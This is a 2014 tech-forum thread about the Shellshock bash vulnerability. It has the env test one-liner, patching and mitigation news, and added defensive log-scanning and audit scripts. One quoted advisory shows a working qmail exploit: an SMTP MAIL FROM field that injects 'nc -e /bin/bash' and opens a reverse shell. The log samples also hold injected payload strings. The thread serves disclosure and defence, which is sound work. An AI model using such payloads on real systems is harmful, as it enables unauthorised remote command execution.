Geekzone: technology news, blogs, forums


alexx

700 posts

Ultimate Geek


#152414 25-Sep-2014 16:56

By now you've probably all heard about CVE-2014-6271:

Overview

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution.

http://seclists.org/oss-sec/2014/q3/650 
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271

This affects bash in Linux distributions, and bash in OS X also appears to be vulnerable.

Test with the following in the shell...

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"


If you get the following output, then the system is vulnerable.

vulnerable
this is a test



More info:
http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/

But things might be worse than they appear, as the latest patches do not appear to cover all cases of string processing in bash, so there might be additional exploits to come.
https://news.ycombinator.com/item?id=8365158




#include <standard.disclaimer>


alexx

700 posts

Ultimate Geek


  #1137644 25-Sep-2014 17:02

For some reason my formatting is messed up. (fixed).




#include <standard.disclaimer>


freitasm
BDFL - Memuneh
68899 posts

Uber Geek

Administrator
Trusted
Geekzone
Lifetime subscriber

  #1137754 25-Sep-2014 19:22

Here is a quick overview of why this is so bad. And think of the number of connected systems that won't have updates...






 

 

These links are referral codes

 

Geekzone broadband switch | Electricity comparison and switch | Hatch investment (NZ$ 10 bonus if NZ$100 deposited within 30 days) | Sharesies | Mighty Ape | Backblaze | Coinbase | TheMarket | My technology disclosure


 
 
 
 


hio77
'That VDSL Cat'
12626 posts

Uber Geek

Trusted
Subscriber

  #1137780 25-Sep-2014 19:57

Hm. Didn't hear about this till seeing the post..

I see what I'm going to be doing over the next few days....





#include <std_disclaimer>

 

Any comments made are personal opinion and do not reflect directly on the position my current or past employers may have.

 


Inphinity
2578 posts

Uber Geek


  #1137783 25-Sep-2014 20:09

Spent a chunk of the day patching for it, woohoo.

johnr
19282 posts

Uber Geek
Inactive user


  #1137787 25-Sep-2014 20:21

Damn, not good :(

freitasm
BDFL - Memuneh
68899 posts

Uber Geek

Administrator
Trusted
Geekzone
Lifetime subscriber

  #1138245 26-Sep-2014 13:51




 

 



gzt
11685 posts

Uber Geek

Lifetime subscriber

  #1138283 26-Sep-2014 14:46

IMO Red Hat's security summary and related blog post provide the best clarity on the issue. Clearly it needs to be fixed but not every system will be vulnerable in practice. Depends on exposed surfaces.

 
 
 
 


alexx

700 posts

Ultimate Geek


  #1142857 27-Sep-2014 22:54

gzt: IMO Red Hat's security summary and related blog post provide the best clarity on the issue. Clearly it needs to be fixed but not every system will be vulnerable in practice. Depends on exposed surfaces.


The Red Hat summary is one of the better ones, but this is another good one that tracks the different issues and includes a website tester.
https://shellshocker.net/

Please note the warning: Do not test against websites that you do not have permission to test against.




#include <standard.disclaimer>


insane
2416 posts

Uber Geek

Trusted
Subscriber

  #1142858 27-Sep-2014 23:06

I'm amazed this hasn't had as much media attention as Heartbleed, I mean this one is a real rip-snorter of a bug.

Dratsab
3598 posts

Uber Geek

Trusted
Lifetime subscriber

  #1142873 28-Sep-2014 07:33

insane: I'm amazed this hasn't had as much media attention as Heartbleed, I mean this one is a real rip-snorter of a bug.

Two reasons:
1. It's nix based so the media doesn't have a clue how many and what type of systems could be affected.
2. OS X remains well within the RDF.

wasabi2k
2092 posts

Uber Geek


  #1142882 28-Sep-2014 09:27

Yeah they screwed up reporting Heartbleed - I shudder to think how they would report on this.

We've tackled it at the edge with Check Point IPS and NetScaler responder policies.
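
Edge filtering and log review for this bug both key on the function-definition prefix seen in the probe from the opening post. The following is an added example, not part of the thread and not the Check Point or NetScaler signatures: it assumes Apache "combined" access logs, and the regex, function names and sample lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag logged request fields that carry a bash
# function-definition prefix, "()" then optional blanks then "{".

# Constructed sample lines in Apache "combined" format (not real traffic).
sample_log() {
cat <<'EOF'
192.0.2.10 - - [25/Sep/2014:16:56:01 +1200] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.66 - - [25/Sep/2014:17:02:13 +1200] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; echo vulnerable"
192.0.2.67 - - [25/Sep/2014:17:03:40 +1200] "GET /index.html HTTP/1.1" 200 1024 "(){ :; }; echo vulnerable" "curl/7.38.0"
192.0.2.11 - - [25/Sep/2014:17:05:00 +1200] "GET /docs/f().html HTTP/1.1" 404 209 "-" "Wget/1.15"
EOF
}

# Read a combined-format log on stdin and print "client field" for each
# quoted field (request line, referer, user-agent) matching the prefix.
# Splitting on double quotes assumes the logged values contain no
# escaped quotes; a full parser is needed if they can.
shellshock_hits() {
    awk -F'"' '{
        split($1, head, " ")
        name[2] = "request"; name[4] = "referer"; name[6] = "user-agent"
        for (i = 2; i <= 6; i += 2)
            if ($i ~ /[(][)][ \t]*[{]/)
                print head[1], name[i]
    }'
}

sample_log | shellshock_hits
```

The last sample line contains `()` in a path but no following `{`, so it is not reported. Only headers that the log format records can be matched this way.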

MackinNZ
434 posts

Ultimate Geek

Subscriber

  #1142919 28-Sep-2014 11:48

QNAP have now issued an update to firmware 4.1.1 (build 0927) to address this vulnerability.

Release notes:

 

2014-09-27

 

4.1.1 build 0927

 

 

[QTS 4.1.1 Build 0927]

[Bug Fixes]
 - Fixed the Shellshock security vulnerability that could allow attackers to gain remote control over the system (CVE-2014-6271).

 


freitasm
BDFL - Memuneh
68899 posts

Uber Geek

Administrator
Trusted
Geekzone
Lifetime subscriber

  #1142986 28-Sep-2014 14:18

And if you think ONLY web servers are vulnerable... Think again: qmail is a vector for CVE-2014-6271 (bash "shellshock").


As has already been said, upgrade your bash now!

The preconditions for this attack to work are:

1) "Shellshock"-vulnerable bash
2) /bin/sh symlinked to bash
3) Email delivery via qmail to a valid user with a .qmail file containing
ANY program delivery (the actual program being delivered to is irrelevant)

Example:

======

(terminal 0)

$ nc -l -p 7777

(terminal 1)

$ pwd
/home/kgeorge
$ cat .qmail
|/bin/cat
$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 mail.example.com ESMTP
ehlo me
250-mail.example.com
250-PIPELINING
250 8BITMIME
mail from:<() { :; }; nc -e /bin/bash localhost 7777>
250 ok
rcpt to:<kgeorge [at] example>
250 ok
data
354 go ahead
Subject: Vuln

.
250 ok 1411674782 qp 4151

(terminal 0)

$ nc -l -p 7777
ls
mail
whoami
kgeorge





 

 

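
The probe from the opening post and the three preconditions listed in the qmail post above can be checked together on a host you administer. This is an added example, not part of the thread or of the quoted advisory; the function names, the `/home` default and the search depth are assumptions.

```shell
#!/bin/sh
# Added example: checks the three preconditions named in the thread.

# Map probe output to a verdict. "vulnerable" means the command placed
# after the function body in the environment variable was executed.
classify_probe() {
    case "$1" in
        *vulnerable*)       echo vulnerable ;;
        *"this is a test"*) echo patched ;;
        *)                  echo unknown ;;   # shell missing or did not run
    esac
}

# Precondition 1: run the thread's probe against one shell binary.
probe_shell() {
    out=$(env x='() { :;}; echo vulnerable' "${1:-bash}" \
          -c 'echo this is a test' 2>/dev/null) || true
    classify_probe "$out"
}

# Precondition 2: is /bin/sh really bash? Asking for BASH_VERSION also
# catches hard links and copies that a symlink check would miss.
sh_is_bash() {
    ver=$("${1:-/bin/sh}" -c 'printf %s "${BASH_VERSION:-}"' 2>/dev/null) || true
    [ -n "$ver" ]
}

# Precondition 3: .qmail files containing a program delivery ("|" line).
# The /home default and depth of 2 are assumptions about the layout.
qmail_program_files() {
    find "${1:-/home}" -maxdepth 2 -type f -name '.qmail*' 2>/dev/null |
    while IFS= read -r f; do
        if grep -q '^|' "$f" 2>/dev/null; then printf '%s\n' "$f"; fi
    done
}

audit() {
    if sh_is_bash; then sh=yes; else sh=no; fi
    n=$(qmail_program_files "${2:-/home}" | wc -l | tr -d ' ')
    echo "bash=$(probe_shell "${1:-bash}") sh_is_bash=$sh qmail_program_files=$n"
}

audit "$@"
```

A `patched` verdict covers only the CVE-2014-6271 probe shown in the thread; it says nothing about the follow-up parsing issues the opening post mentions.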

